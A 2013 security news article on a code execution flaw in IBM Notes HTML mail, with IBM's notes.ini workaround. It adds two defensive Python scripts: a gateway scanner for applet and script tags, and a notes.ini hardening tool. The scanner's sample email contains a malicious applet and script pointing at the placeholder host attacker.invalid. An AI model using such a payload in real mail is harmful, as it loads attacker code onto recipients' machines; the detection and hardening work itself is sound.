IBM is preparing a fix for the vulnerability identified by n.runs researchers

May 2, 2013 13:00 GMT

Researchers from n.runs have identified an arbitrary code execution vulnerability in IBM Notes (formerly Lotus Notes), the widely deployed email and collaboration client. Versions 8.0.x, 8.5.x and 9.0 of the application are affected.

According to the researchers, the Notes mail client renders Java applet and JavaScript tags inside HTML emails without filtering them, so an attacker can craft a message that loads a Java applet from a remote, attacker-controlled server when the recipient reads it.

“Combined with known Java sandbox escape vulnerabilities, it can be used to fully compromise the user reading the email,” experts wrote in a post on Full Disclosure.
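The mechanism above is easy to check for at a mail gateway: walk the HTML parts of a message and flag any applet or script tag, noting whether it points at a remote host. The following is an added example, not code from the article or from n.runs; the message it scans is constructed for the demonstration and attacker.invalid is a placeholder hostname.

```python
import email
from email import policy
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a single-part HTML mail of the kind described above.
# attacker.invalid is a placeholder, not a real host.
SAMPLE_MAIL = """\
From: sender@example.invalid
To: victim@example.invalid
Subject: quarterly report
MIME-Version: 1.0
Content-Type: text/html; charset="utf-8"

<html><body>
<p>Please review the attached figures.</p>
<applet code="Report.class" codebase="http://attacker.invalid/applets/" width="1" height="1"></applet>
<script>document.location = "http://attacker.invalid/track";</script>
</body></html>
"""

# Tags the article says the Notes client renders unfiltered in HTML mail.
WATCHED_TAGS = {"applet", "script"}
# Attributes that can make the client fetch code from another host.
REMOTE_ATTRS = ("codebase", "archive", "src")


class ActiveContentFinder(HTMLParser):
    """Collect every <applet> and <script> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in WATCHED_TAGS:
            self.findings.append((tag, dict(attrs)))


def is_remote(url):
    """True if the attribute value is an absolute URL to another host."""
    parsed = urlparse(url or "")
    return parsed.scheme in ("http", "https", "ftp") and bool(parsed.netloc)


def scan_message(raw):
    """Return one finding per applet/script tag found in any text/html part."""
    msg = email.message_from_string(raw, policy=policy.default)
    findings = []
    for part in msg.walk():                 # yields the message itself if single-part
        if part.get_content_type() != "text/html":
            continue
        finder = ActiveContentFinder()
        finder.feed(part.get_content())     # decoded str under policy.default
        for tag, attrs in finder.findings:
            remote = any(is_remote(attrs.get(a)) for a in REMOTE_ATTRS)
            findings.append({"tag": tag, "remote": remote, "attrs": attrs})
    return findings


if __name__ == "__main__":
    for finding in scan_message(SAMPLE_MAIL):
        print(finding)
```

In the sample the applet is flagged as remote because its codebase points off-host, while the inline script is flagged but not remote; both are worth blocking or quarantining at the boundary, since the client-side fix is not yet available.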

IBM has been notified of the security hole and a fix is expected to be released shortly.

In the meantime, IBM advises users to disable Java applets, Java access from JavaScript (LiveConnect), and JavaScript in the client. The same result can be achieved in the notes.ini file by setting the EnableJavaApplets, EnableLiveConnect and EnableJavaScript variables to 0.
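On a fleet of Notes installs the notes.ini workaround is only useful if it can be verified and applied consistently. The script below is an added example, not IBM's or n.runs' code: it audits a notes.ini fragment for the three settings named above and rewrites it so each is 0, leaving every other line untouched. The sample fragment is constructed, the [Notes] header and Directory line are placeholders, and the script assumes notes.ini keys are compared case-insensitively.

```python
import sys

# The three workaround settings and the value that disables each feature.
HARDENED = {
    "EnableJavaApplets": "0",
    "EnableLiveConnect": "0",   # Java access from JavaScript
    "EnableJavaScript": "0",
}

# Constructed sample fragment; the non-security keys are placeholders.
# Note that EnableLiveConnect is absent, which this script treats as not mitigated.
SAMPLE_INI = """\
[Notes]
Directory=C:\\Notes\\data
KitType=1
EnableJavaApplets=1
EnableJavaScript=1
"""

# Assumption: notes.ini keys are case-insensitive, so match on lowercased names.
_BY_LOWER = {name.lower(): name for name in HARDENED}


def _setting_name(line):
    """Return the canonical setting name if this line sets one of ours, else None."""
    key, sep, _ = line.partition("=")
    if not sep or line.lstrip().startswith((";", "[")):
        return None
    return _BY_LOWER.get(key.strip().lower())


def audit_notes_ini(text):
    """Map each workaround setting to its current value, or None if absent."""
    found = {name: None for name in HARDENED}
    for line in text.splitlines():
        name = _setting_name(line)
        if name:
            found[name] = line.partition("=")[2].strip()
    return found


def is_mitigated(text):
    """True only when all three settings are present and set to 0."""
    return all(value == "0" for value in audit_notes_ini(text).values())


def harden_notes_ini(text):
    """Return the fragment with all three settings forced to 0, others unchanged."""
    out, seen = [], set()
    for line in text.splitlines():
        name = _setting_name(line)
        if name:
            out.append(f"{name}={HARDENED[name]}")   # overwrite in place
            seen.add(name)
        else:
            out.append(line)
    for name in HARDENED:
        if name not in seen:
            out.append(f"{name}={HARDENED[name]}")   # append missing keys
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # Optional: pass a real notes.ini path to audit it instead of the sample.
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_INI
    print("audit:", audit_notes_ini(text))
    print("mitigated:", is_mitigated(text))
    if not is_mitigated(text):
        print(harden_notes_ini(text), end="")
```

A missing key counts as unmitigated rather than assuming a safe default, and the rewrite is idempotent, so it can be run from deployment tooling on every host. The client reads notes.ini at startup, so the audit is only meaningful after Notes has been restarted, and disabling JavaScript client-wide will also break legitimate HTML mail and applications until IBM's fix ships.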